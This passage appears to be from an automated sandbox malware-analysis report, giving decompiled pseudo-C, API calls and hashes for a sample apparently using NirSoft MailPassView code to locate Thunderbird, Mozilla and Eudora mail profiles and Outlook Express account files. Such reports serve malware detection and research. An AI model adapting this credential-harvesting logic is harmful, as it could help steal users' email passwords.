				 *0x46b008 = 2;
				 *0x48704a = 2;
				 *0x487000 = E004052A8;
				if(E004033FC() != 0) {
					_t5 = E0040342C();
				}
				E004034F0(_t5);
				 *0x487050 = 0xd7b0;
				 *0x48721c = 0xd7b0;
				 *0x4873e8 = 0xd7b0;
				E004051A0();
				 *0x48703c = GetCommandLineA();
				 *0x487038 = E00401388();
				_t10 = GetCurrentThreadId();
				 *0x487030 = _t10;
				return _t10;
			}




                                                                                0x004065d2
                                                                                0x004065d5
                                                                                0x004065dc
                                                                                0x004065e3
                                                                                0x004065f4
                                                                                0x004065f6
                                                                                0x004065f6
                                                                                0x004065fb
                                                                                0x00406600
                                                                                0x00406609
                                                                                0x00406612
                                                                                0x0040661b
                                                                                0x00406625
                                                                                0x0040662f
                                                                                0x00406634
                                                                                0x00406639
                                                                                0x0040663e

                                                                                APIs
                                                                                  • Part of subcall function 004033FC: GetKeyboardType.USER32(00000000), ref: 00403401
                                                                                  • Part of subcall function 004033FC: GetKeyboardType.USER32(00000001), ref: 0040340D
                                                                                • GetCommandLineA.KERNEL32 ref: 00406620
                                                                                • GetCurrentThreadId.KERNEL32 ref: 00406634
                                                                                  • Part of subcall function 0040342C: RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 0040344E
                                                                                  • Part of subcall function 0040342C: RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,0040349D,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00403481
                                                                                  • Part of subcall function 0040342C: RegCloseKey.ADVAPI32(?,004034A4,00000000,?,00000004,00000000,0040349D,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00403497
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.781461693.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.781450349.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781523475.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781534355.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781549939.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781559354.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781573035.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781587724.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: KeyboardType$CloseCommandCurrentLineOpenQueryThreadValue
                                                                                • String ID: 84t
                                                                                • API String ID: 3316616684-964373480
                                                                                • Opcode ID: 5be99165020f628b7bf262819b4d6f32d6e913febd8137d6059eb3d1bf4bde94
                                                                                • Instruction ID: 87c8d1285b935a8802c7f007350c1fe5a13bb065e2eb45d0b00c20e4d5df6914
                                                                                • Opcode Fuzzy Hash: 5be99165020f628b7bf262819b4d6f32d6e913febd8137d6059eb3d1bf4bde94
                                                                                • Instruction Fuzzy Hash: E6F012B080834095E701FFB598A620D3E61AF03348770597FE8406A2A7EB7CC1449BEE
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00433464, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 87%
                                                                                			E00433464(struct tagPOINT* __eax) {
				struct HWND__* _t8;
				void* _t9;

				_push(__eax->y);
				_t8 = WindowFromPoint( *__eax);
				if(_t8 != 0) {
					while(E0043341C(_t8, _t9) == 0) {
						_t8 = GetParent(_t8);
						if(_t8 != 0) {
							continue;
						}
						goto L3;
					}
				}
				L3:
				return _t8;
			}





                                                                                0x00433465
                                                                                0x0043346f
                                                                                0x00433473
                                                                                0x00433475
                                                                                0x00433486
                                                                                0x0043348a
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0043348a
                                                                                0x00433475
                                                                                0x0043348c
                                                                                0x0043348f

                                                                                APIs
                                                                                • WindowFromPoint.USER32(M3C,?,00000000,00433046,?,-0000000C,?), ref: 0043346A
                                                                                  • Part of subcall function 0043341C: GlobalFindAtomA.KERNEL32 ref: 00433430
                                                                                  • Part of subcall function 0043341C: GetPropA.USER32 ref: 00433447
                                                                                • GetParent.USER32(00000000), ref: 00433481
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.781461693.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.781450349.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781523475.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781534355.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781549939.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781559354.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781573035.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781587724.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: AtomFindFromGlobalParentPointPropWindow
                                                                                • String ID: M3C
                                                                                • API String ID: 3524704154-2629677723
                                                                                • Opcode ID: 98702e36936e0e1a5cccc6fada8a93c2d553a3460fb0d51efd6170255a84fd1d
                                                                                • Instruction ID: faf4f0c274cddd3732b65d19d4330b845a9b5ea9ebc25192a453e9e8282a3d01
                                                                                • Opcode Fuzzy Hash: 98702e36936e0e1a5cccc6fada8a93c2d553a3460fb0d51efd6170255a84fd1d
                                                                                • Instruction Fuzzy Hash: 6FD0C7613007021B9F133FA55DC151765885F3D34A700A47EB5016F363DE6ECD181718
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Analysis Process: vbc.exe PID: 6920 Parent PID: 4500 vbc.exeCOMMON

                                                                                Executed Functions

                                                                                Function 0040724C, Relevance: 31.6, APIs: 11, Strings: 7, Instructions: 143stringCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E0040724C(signed int _a4) {
				char _v5;
				char _v6;
				char _v7;
				char _v8;
				char _v9;
				char _v10;
				char _v11;
				char _v12;
				char _v13;
				char _v14;
				char _v15;
				char _v16;
				char _v17;
				char _v18;
				char _v19;
				void _v20;
				long _v24;
				int _v28;
				int _v32;
				void* _v36;
				void _v291;
				char _v292;
				void _v547;
				char _v548;
				void _v1058;
				short _v1060;
				void _v1570;
				short _v1572;
				int _t88;
				signed int _t91;
				signed int _t92;
				signed int _t94;
				signed int _t96;
				signed int _t99;
				signed int _t104;
				signed short* _t110;
				void* _t113;
				void* _t114;

				_t92 = 0;
				_v20 = 0xa3;
				_v19 = 0x1e;
				_v18 = 0xf3;
				_v17 = 0x69;
				_v16 = 7;
				_v15 = 0x62;
				_v14 = 0xd9;
				_v13 = 0x1f;
				_v12 = 0x1e;
				_v11 = 0xe9;
				_v10 = 0x35;
				_v9 = 0x7d;
				_v8 = 0x4f;
				_v7 = 0xd2;
				_v6 = 0x7d;
				_v5 = 0x48;
				_v292 = 0;
				memset( &_v291, 0, 0xff);
				_v548 = 0;
				memset( &_v547, 0, 0xff);
				_v1572 = 0;
				memset( &_v1570, 0, 0x1fe);
				_v1060 = 0;
				memset( &_v1058, 0, 0x1fe);
				_v36 = _a4 + 4;
				_a4 = 0;
				_v24 = 0xff;
				GetComputerNameA( &_v292,  &_v24); // executed
				_v24 = 0xff;
				GetUserNameA( &_v548,  &_v24); // executed
				MultiByteToWideChar(0, 0,  &_v292, 0xffffffff,  &_v1572, 0xff);
				MultiByteToWideChar(0, 0,  &_v548, 0xffffffff,  &_v1060, 0xff);
				_v32 = strlen( &_v292);
				_t88 = strlen( &_v548);
				_t113 = _v36;
				_v28 = _t88;
				memcpy(_t113,  &_v20, 0x10);
				_t91 = 0xba0da71d;
				if(_v28 > 0) {
					_t110 =  &_v1060;
					do {
						_t104 = _a4 & 0x80000003;
						if(_t104 < 0) {
							_t104 = (_t104 - 0x00000001 | 0xfffffffc) + 1;
						}
						_t96 = ( *_t110 & 0x0000ffff) * _t91;
						_t91 = _t91 * 0xbc8f;
						 *(_t113 + _t104 * 4) =  *(_t113 + _t104 * 4) ^ _t96;
						_a4 = _a4 + 1;
						_t110 =  &(_t110[1]);
					} while (_a4 < _v28);
				}
				if(_v32 > _t92) {
					do {
						_t99 = _a4 & 0x80000003;
						if(_t99 < 0) {
							_t99 = (_t99 - 0x00000001 | 0xfffffffc) + 1;
						}
						_t94 = ( *(_t114 + _t92 * 2 - 0x620) & 0x0000ffff) * _t91;
						_t91 = _t91 * 0xbc8f;
						 *(_t113 + _t99 * 4) =  *(_t113 + _t99 * 4) ^ _t94;
						_a4 = _a4 + 1;
						_t92 = _t92 + 1;
					} while (_t92 < _v32);
				}
				return _t91;
			}









































                                                                                0x0040725d
                                                                                0x00407268
                                                                                0x0040726c
                                                                                0x00407270
                                                                                0x00407274
                                                                                0x00407278
                                                                                0x0040727c
                                                                                0x00407280
                                                                                0x00407284
                                                                                0x00407288
                                                                                0x0040728c
                                                                                0x00407290
                                                                                0x00407294
                                                                                0x00407298
                                                                                0x0040729c
                                                                                0x004072a0
                                                                                0x004072a4
                                                                                0x004072a8
                                                                                0x004072ae
                                                                                0x004072bc
                                                                                0x004072c2
                                                                                0x004072d5
                                                                                0x004072dc
                                                                                0x004072ea
                                                                                0x004072f1
                                                                                0x004072fc
                                                                                0x0040730d
                                                                                0x00407310
                                                                                0x00407313
                                                                                0x00407324
                                                                                0x00407327
                                                                                0x00407346
                                                                                0x0040735b
                                                                                0x00407369
                                                                                0x00407373
                                                                                0x00407378
                                                                                0x0040737b
                                                                                0x00407385
                                                                                0x00407390
                                                                                0x00407395
                                                                                0x00407397
                                                                                0x0040739d
                                                                                0x004073a0
                                                                                0x004073a6
                                                                                0x004073ac
                                                                                0x004073ac
                                                                                0x004073b0
                                                                                0x004073b3
                                                                                0x004073bc
                                                                                0x004073be
                                                                                0x004073c5
                                                                                0x004073c6
                                                                                0x0040739d
                                                                                0x004073ce
                                                                                0x004073d0
                                                                                0x004073d3
                                                                                0x004073d9
                                                                                0x004073df
                                                                                0x004073df
                                                                                0x004073e8
                                                                                0x004073eb
                                                                                0x004073f4
                                                                                0x004073f6
                                                                                0x004073f9
                                                                                0x004073fa
                                                                                0x004073d0
                                                                                0x00407403

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: memset$ByteCharMultiNameWidestrlen$ComputerUsermemcpy
                                                                                • String ID: 5$H$O$b$i$}$}
                                                                                • API String ID: 1832431107-3760989150
                                                                                • Opcode ID: 892f1d25977d50633ddef969ddbe2b4ff3cde350e5ee45bf306cc9825cca91de
                                                                                • Instruction ID: 8a8033fc9206e0c4c361a826d49ab5f0cafd1e40d7200dcd25d3d532c5214641
                                                                                • Opcode Fuzzy Hash: 892f1d25977d50633ddef969ddbe2b4ff3cde350e5ee45bf306cc9825cca91de
                                                                                • Instruction Fuzzy Hash: AC510871C0025DBEDB11CBA8CC41AEEBBBDEF49314F0442EAE955E6191D3389B84CB65
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00406EC3, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58filestringCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E00406EC3(void** __eax) {
				void* __esi;
				void* _t15;
				int _t16;
				int _t17;
				void* _t26;
				void** _t38;
				void** _t40;
				void* _t45;

				_t40 = __eax;
				_t15 =  *__eax;
				if(_t15 != 0xffffffff) {
					_t16 = FindNextFileA(_t15,  &(__eax[0x52])); // executed
					 *(_t45 + 4) = _t16;
					if(_t16 != 0) {
						goto L5;
					} else {
						E00406F5B(_t40);
						goto L4;
					}
				} else {
					_t26 = FindFirstFileA( &(__eax[1]),  &(__eax[0x52])); // executed
					 *_t40 = _t26;
					 *(_t45 + 4) = 0 | _t26 != 0xffffffff;
					L4:
					if( *(_t45 + 4) != 0) {
						L5:
						_t38 =  &(_t40[0xa2]);
						_t28 =  &(_t40[0x5d]);
						_t41 =  &(_t40[0xf3]);
						_t17 = strlen( &(_t40[0xf3]));
						if(strlen( &(_t40[0x5d])) + _t17 + 1 >= 0x143) {
							 *_t38 = 0;
						} else {
							E004062AD(_t38, _t41, _t28);
						}
					}
				}
				return  *(_t45 + 4);
			}











                                                                                0x00406ec5
                                                                                0x00406ec7
                                                                                0x00406ecc
                                                                                0x00406ef7
                                                                                0x00406eff
                                                                                0x00406f03
                                                                                0x00000000
                                                                                0x00406f05
                                                                                0x00406f05
                                                                                0x00000000
                                                                                0x00406f05
                                                                                0x00406ece
                                                                                0x00406ed9
                                                                                0x00406ee7
                                                                                0x00406ee9
                                                                                0x00406f0a
                                                                                0x00406f0f
                                                                                0x00406f11
                                                                                0x00406f14
                                                                                0x00406f1a
                                                                                0x00406f20
                                                                                0x00406f27
                                                                                0x00406f3f
                                                                                0x00406f4e
                                                                                0x00406f41
                                                                                0x00406f45
                                                                                0x00406f4b
                                                                                0x00406f53
                                                                                0x00406f0f
                                                                                0x00406f5a

                                                                                APIs
                                                                                • FindFirstFileA.KERNELBASE(?,?,?,?,00410CA1,*.oeaccount,rA,?,00000104), ref: 00406ED9
                                                                                • FindNextFileA.KERNELBASE(?,?,?,?,00410CA1,*.oeaccount,rA,?,00000104), ref: 00406EF7
                                                                                • strlen.MSVCRT ref: 00406F27
                                                                                • strlen.MSVCRT ref: 00406F2F
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: FileFindstrlen$FirstNext
                                                                                • String ID: rA
                                                                                • API String ID: 379999529-474049127
                                                                                • Opcode ID: 9a66d1681466aca7d0b3f0cd3a87e00f7da5b3e9059264b02d426353c7cea173
                                                                                • Instruction ID: 479c8733b6b08075922562257f7174063dbd0ea9e1486761d8d5d3546bede414
                                                                                • Opcode Fuzzy Hash: 9a66d1681466aca7d0b3f0cd3a87e00f7da5b3e9059264b02d426353c7cea173
                                                                                • Instruction Fuzzy Hash: 00118272005205AFD714DB34E844ADBB3D9DF44324F21493FF55AD21D0EB38A9548758
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00401E8B, Relevance: 52.8, APIs: 19, Strings: 11, Instructions: 261stringregistryCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 97%
                                                                                			E00401E8B(void* __eflags, char* _a4) {
				signed int _v8;
				int _v12;
				void _v275;
				char _v276;
				void _v539;
				char _v540;
				void _v795;
				char _v796;
				void _v1059;
				char _v1060;
				void _v1323;
				char _v1324;
				void _v2347;
				char _v2348;
				void* __edi;
				void* __esi;
				int _t65;
				char* _t69;
				char _t70;
				int _t71;
				char _t75;
				void* _t76;
				long _t78;
				void* _t83;
				int _t85;
				void* _t87;
				int _t104;
				int _t108;
				char _t126;
				void* _t137;
				void* _t139;
				char* _t157;
				char* _t158;
				char* _t160;
				int _t161;
				void* _t164;
				CHAR* _t169;
				char* _t170;
				void* _t171;
				void* _t172;
				void* _t173;
				void* _t174;
				void* _t175;

				_v540 = 0;
				memset( &_v539, 0, 0x104);
				_t164 = 0x1a;
				E0040EE59( &_v540, _t164); // executed
				_t65 = strlen("Mozilla\\Profiles");
				_t6 = strlen( &_v540) + 1; // 0x1
				_t172 = _t171 + 0x14;
				if(_t65 + _t6 >= 0x104) {
					_t69 = _a4;
					 *_t69 = 0;
					_t157 = _t69;
				} else {
					_t157 = _a4;
					E004062AD(_t157,  &_v540, "Mozilla\\Profiles");
				}
				_t70 = E0040614B(_t157);
				if(_t70 == 0) {
					 *_t157 = _t70;
				}
				_t158 = _t157 + 0x105;
				_t71 = strlen("Thunderbird\\Profiles");
				_t12 = strlen( &_v540) + 1; // 0x1
				if(_t71 + _t12 >= 0x104) {
					 *_t158 = 0;
				} else {
					E004062AD(_t158,  &_v540, "Thunderbird\\Profiles");
				}
				_t75 = E0040614B(_t158);
				_pop(_t137);
				if(_t75 == 0) {
					 *_t158 = _t75;
				}
				_t160 = _a4 + 0x20a;
				_t76 = E00401C97(_t137, _t160, 0x80000001, "Software\\Qualcomm\\Eudora\\CommandLine", "current"); // executed
				_t173 = _t172 + 0xc;
				if(_t76 == 0) {
					_t126 = E00401C97(_t137, _t160, 0x80000002, "Software\\Classes\\Software\\Qualcomm\\Eudora\\CommandLine\\current", 0x412466); // executed
					_t173 = _t173 + 0xc;
					if(_t126 == 0) {
						 *_t160 = _t126;
					}
				}
				_v8 = _v8 & 0x00000000;
				_t78 = E0040EB3F(0x80000002, "Software\\Mozilla\\Mozilla Thunderbird",  &_v8);
				_t174 = _t173 + 0xc;
				if(_t78 != 0) {
					L32:
					_t169 = _a4 + 0x30f;
					if( *_t169 != 0) {
						L35:
						return _t78;
					}
					ExpandEnvironmentStringsA("%programfiles%\\Mozilla Thunderbird", _t169, 0x104);
					_t78 = E0040614B(_t169);
					if(_t78 != 0) {
						goto L35;
					}
					 *_t169 = _t78;
					return _t78;
				} else {
					_v796 = _t78;
					_t161 = 0;
					memset( &_v795, 0, 0xff);
					_v12 = 0;
					_t83 = E0040EC05(_v8, 0,  &_v796);
					_t175 = _t174 + 0x18;
					if(_t83 != 0) {
						L31:
						_t78 = RegCloseKey(_v8);
						goto L32;
					}
					_t170 = "sqlite3.dll";
					do {
						_t85 = atoi( &_v796);
						_pop(_t139);
						if(_t85 < 3) {
							goto L28;
						}
						_v2348 = 0;
						memset( &_v2347, _t161, 0x3ff);
						_v276 = 0;
						memset( &_v275, _t161, 0x104);
						sprintf( &_v2348, "%s\\Main",  &_v796);
						E0040EBC1(_t139, _v8,  &_v2348, "Install Directory",  &_v276, 0x104);
						_t175 = _t175 + 0x38;
						if(_v276 != 0 && E0040614B( &_v276) != 0) {
							_v1060 = 0;
							memset( &_v1059, _t161, 0x104);
							_v1324 = 0;
							memset( &_v1323, _t161, 0x104);
							_t104 = strlen(_t170);
							_t41 = strlen( &_v276) + 1; // 0x1
							_t175 = _t175 + 0x20;
							if(_t104 + _t41 >= 0x104) {
								_v1060 = 0;
							} else {
								E004062AD( &_v1060,  &_v276, _t170);
							}
							_t108 = strlen("nss3.dll");
							_t47 = strlen( &_v276) + 1; // 0x1
							if(_t108 + _t47 >= 0x104) {
								_v1324 = 0;
							} else {
								E004062AD( &_v1324,  &_v276, "nss3.dll");
							}
							if(E0040614B( &_v1060) == 0 || E0040614B( &_v1324) == 0) {
								_t161 = 0;
								goto L28;
							} else {
								strcpy(_a4 + 0x30f,  &_v276);
								goto L31;
							}
						}
						L28:
						_v12 = _v12 + 1;
						_t87 = E0040EC05(_v8, _v12,  &_v796);
						_t175 = _t175 + 0xc;
					} while (_t87 == 0);
					goto L31;
				}
			}














































                                                                                0x00401ea6
                                                                                0x00401ead
                                                                                0x00401eb4
                                                                                0x00401ebb
                                                                                0x00401ec6
                                                                                0x00401ed9
                                                                                0x00401edd
                                                                                0x00401ee2
                                                                                0x00401efa
                                                                                0x00401efd
                                                                                0x00401f00
                                                                                0x00401ee4
                                                                                0x00401ee4
                                                                                0x00401ef1
                                                                                0x00401ef7
                                                                                0x00401f03
                                                                                0x00401f0b
                                                                                0x00401f0d
                                                                                0x00401f0d
                                                                                0x00401f14
                                                                                0x00401f1a
                                                                                0x00401f2d
                                                                                0x00401f35
                                                                                0x00401f4e
                                                                                0x00401f37
                                                                                0x00401f45
                                                                                0x00401f4b
                                                                                0x00401f52
                                                                                0x00401f59
                                                                                0x00401f5a
                                                                                0x00401f5c
                                                                                0x00401f5c
                                                                                0x00401f6b
                                                                                0x00401f76
                                                                                0x00401f7b
                                                                                0x00401f85
                                                                                0x00401f92
                                                                                0x00401f97
                                                                                0x00401f9c
                                                                                0x00401f9e
                                                                                0x00401f9e
                                                                                0x00401f9c
                                                                                0x00401fa0
                                                                                0x00401fae
                                                                                0x00401fb3
                                                                                0x00401fb8
                                                                                0x004021a9
                                                                                0x004021ac
                                                                                0x004021b5
                                                                                0x004021d5
                                                                                0x004021d5
                                                                                0x004021d5
                                                                                0x004021be
                                                                                0x004021c5
                                                                                0x004021cd
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x004021cf
                                                                                0x00000000
                                                                                0x00401fbe
                                                                                0x00401fc3
                                                                                0x00401fc9
                                                                                0x00401fd3
                                                                                0x00401fe3
                                                                                0x00401fe6
                                                                                0x00401feb
                                                                                0x00401ff0
                                                                                0x004021a0
                                                                                0x004021a3
                                                                                0x00000000
                                                                                0x004021a3
                                                                                0x00401ff6
                                                                                0x00401ffb
                                                                                0x00402002
                                                                                0x0040200a
                                                                                0x0040200b
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040201e
                                                                                0x00402025
                                                                                0x00402033
                                                                                0x0040203a
                                                                                0x00402052
                                                                                0x0040206e
                                                                                0x00402073
                                                                                0x0040207d
                                                                                0x004020a1
                                                                                0x004020a8
                                                                                0x004020b6
                                                                                0x004020bd
                                                                                0x004020c3
                                                                                0x004020d6
                                                                                0x004020da
                                                                                0x004020df
                                                                                0x004020f8
                                                                                0x004020e1
                                                                                0x004020ef
                                                                                0x004020f5
                                                                                0x00402104
                                                                                0x00402117
                                                                                0x0040211f
                                                                                0x0040213c
                                                                                0x00402121
                                                                                0x00402133
                                                                                0x00402139
                                                                                0x00402152
                                                                                0x00402165
                                                                                0x00000000
                                                                                0x00402189
                                                                                0x00402199
                                                                                0x00000000
                                                                                0x0040219f
                                                                                0x00402152
                                                                                0x00402167
                                                                                0x00402167
                                                                                0x00402177
                                                                                0x0040217c
                                                                                0x0040217f
                                                                                0x00000000
                                                                                0x00402187

                                                                                APIs
                                                                                • memset.MSVCRT ref: 00401EAD
                                                                                • strlen.MSVCRT ref: 00401EC6
                                                                                • strlen.MSVCRT ref: 00401ED4
                                                                                • strlen.MSVCRT ref: 00401F1A
                                                                                • strlen.MSVCRT ref: 00401F28
                                                                                • memset.MSVCRT ref: 00401FD3
                                                                                • atoi.MSVCRT ref: 00402002
                                                                                • memset.MSVCRT ref: 00402025
                                                                                • sprintf.MSVCRT ref: 00402052
                                                                                  • Part of subcall function 0040EBC1: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 0040EBFA
                                                                                • memset.MSVCRT ref: 004020A8
                                                                                • memset.MSVCRT ref: 004020BD
                                                                                • strlen.MSVCRT ref: 004020C3
                                                                                • strlen.MSVCRT ref: 004020D1
                                                                                • strlen.MSVCRT ref: 00402104
                                                                                • strlen.MSVCRT ref: 00402112
                                                                                • memset.MSVCRT ref: 0040203A
                                                                                  • Part of subcall function 004062AD: strcpy.MSVCRT(00000000,00000000,sqlite3.dll,00402138,00000000,nss3.dll), ref: 004062B5
                                                                                  • Part of subcall function 004062AD: strcat.MSVCRT(00000000,00000000,00000000,00000000,sqlite3.dll,00402138,00000000,nss3.dll), ref: 004062C4
                                                                                • strcpy.MSVCRT(?,00000000), ref: 00402199
                                                                                • RegCloseKey.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004021A3
                                                                                • ExpandEnvironmentStringsA.KERNEL32(%programfiles%\Mozilla Thunderbird,?,00000104,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004021BE
                                                                                  • Part of subcall function 0040614B: GetFileAttributesA.KERNELBASE(?,004081BE,?,00408274,00000000,?,00000000,00000104,?), ref: 0040614F
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: strlen$memset$Closestrcpy$AttributesEnvironmentExpandFileStringsatoisprintfstrcat
                                                                                • String ID: %programfiles%\Mozilla Thunderbird$%s\Main$Install Directory$Mozilla\Profiles$Software\Classes\Software\Qualcomm\Eudora\CommandLine\current$Software\Mozilla\Mozilla Thunderbird$Software\Qualcomm\Eudora\CommandLine$Thunderbird\Profiles$current$nss3.dll$sqlite3.dll
                                                                                • API String ID: 2492260235-4223776976
                                                                                • Opcode ID: ac5e96ee30ae2dd9ced97f1bdc4fbeb635d430268e29e54df0797c77c4e8013e
                                                                                • Instruction ID: fcae88f02dbfb35d0bd4b12665d2d891c1e7b320b053452542e36e55e3802549
                                                                                • Opcode Fuzzy Hash: ac5e96ee30ae2dd9ced97f1bdc4fbeb635d430268e29e54df0797c77c4e8013e
                                                                                • Instruction Fuzzy Hash: C891E472904158BADB21E765CC46FDA77AC9F44308F1004BBF609F2182EB789BD58B5D
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0040B9AD, Relevance: 43.9, APIs: 19, Strings: 6, Instructions: 168COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 85%
                                                                                			E0040B9AD(void* __ecx, void* __eflags, struct HINSTANCE__* _a4, intOrPtr _a12) {
				char* _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v28;
				intOrPtr _v32;
				void* _v304;
				signed int _v308;
				struct HWND__* _v312;
				intOrPtr _v604;
				struct HACCEL__* _v620;
				struct HWND__* _v644;
				char _v900;
				char _v904;
				char _v908;
				struct tagMSG _v936;
				intOrPtr _v940;
				struct HWND__* _v944;
				struct HWND__* _v948;
				char _v956;
				char _v980;
				char _v988;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t49;
				void* _t52;
				int _t56;
				int _t58;
				int _t68;
				void* _t72;
				int _t75;
				int _t77;
				struct HWND__* _t78;
				int _t80;
				int _t85;
				int _t86;
				struct HWND__* _t100;

				 *0x416b94 = _a4;
				_t49 = E00404837(__ecx);
				if(_t49 != 0) {
					E0040EDAC();
					_t52 = E00406A2C( &_v980);
					_t100 = 0;
					_v940 = 0x20;
					_v948 = 0;
					_v936.hwnd = 0;
					_v944 = 0;
					_v936.message = 0;
					E0040B785(_t52,  &_v900);
					_v8 =  &_v980;
					E00406C87(__eflags,  &_v980, _a12);
					_t56 = E00406DFB(_v16, "/savelangfile");
					__eflags = _t56;
					if(_t56 < 0) {
						E0040823D(); // executed
						_t58 = E00406DFB(_v8, "/deleteregkey");
						__eflags = _t58;
						if(_t58 < 0) {
							 *0x417110 = 0x11223344; // executed
							EnumResourceTypesA( *0x416b94, E0040ED91, 0); // executed
							__eflags =  *0x417110 - 0x1c233487;
							if( *0x417110 == 0x1c233487) {
								__eflags =  *((intOrPtr*)(_v12 + 0x30)) - 1;
								if(__eflags <= 0) {
									L13:
									__imp__CoInitialize(_t100);
									E0040B70A( &_v908);
									__eflags = _v604 - 3;
									if(_v604 != 3) {
										_push(5);
									} else {
										_push(3);
									}
									ShowWindow(_v644, ??);
									UpdateWindow(_v644);
									_v620 = LoadAcceleratorsA( *0x416b94, 0x67);
									E0040AD9D( &_v908);
									_t68 = GetMessageA( &_v936, _t100, _t100, _t100);
									__eflags = _t68;
									if(_t68 == 0) {
										L24:
										__imp__CoUninitialize();
										goto L25;
									} else {
										do {
											_t75 = TranslateAcceleratorA(_v644, _v620,  &_v936);
											__eflags = _t75;
											if(_t75 != 0) {
												goto L23;
											}
											_t78 =  *0x4171ac;
											__eflags = _t78 - _t100;
											if(_t78 == _t100) {
												L21:
												_t80 = IsDialogMessageA(_v644,  &_v936);
												__eflags = _t80;
												if(_t80 == 0) {
													TranslateMessage( &_v936);
													DispatchMessageA( &_v936);
												}
												goto L23;
											}
											_t85 = IsDialogMessageA(_t78,  &_v936);
											__eflags = _t85;
											if(_t85 != 0) {
												goto L23;
											}
											goto L21;
											L23:
											_t77 = GetMessageA( &_v936, _t100, _t100, _t100);
											__eflags = _t77;
										} while (_t77 != 0);
										goto L24;
									}
								}
								_t86 = E0040B8D7( &_v904, __eflags);
								__eflags = _t86;
								if(_t86 == 0) {
									_t100 = 0;
									__eflags = 0;
									goto L13;
								}
								_push(_v28);
								_v904 = 0x41356c;
								L004115D6();
								__eflags = _v304;
								if(_v304 != 0) {
									DeleteObject(_v304);
									_v308 = _v308 & 0x00000000;
								}
								goto L27;
							}
							MessageBoxA(0, "Failed to load the executable file !", "Error", 0x30);
							goto L25;
						}
						RegDeleteKeyA(0x80000001, "Software\\NirSoft\\MailPassView");
						goto L25;
					} else {
						 *0x417488 = 0x416b28;
						E0040836E();
						L25:
						_push(_v32);
						_v908 = 0x41356c;
						L004115D6();
						__eflags = _v308 - _t100;
						if(_v308 != _t100) {
							DeleteObject(_v308);
							_v312 = _t100;
						}
						L27:
						_v908 = 0x412474;
						E00406A4E( &_v988);
						E0040462E( &_v956);
						E00406A4E( &_v988);
						_t72 = 0;
						__eflags = 0;
						goto L28;
					}
				} else {
					_t72 = _t49 + 1;
					L28:
					return _t72;
				}
			}








































                                                                                0x0040b9bf
                                                                                0x0040b9c4
                                                                                0x0040b9cb
                                                                                0x0040b9d3
                                                                                0x0040b9dc
                                                                                0x0040b9e1
                                                                                0x0040b9e7
                                                                                0x0040b9ef
                                                                                0x0040b9f3
                                                                                0x0040b9f7
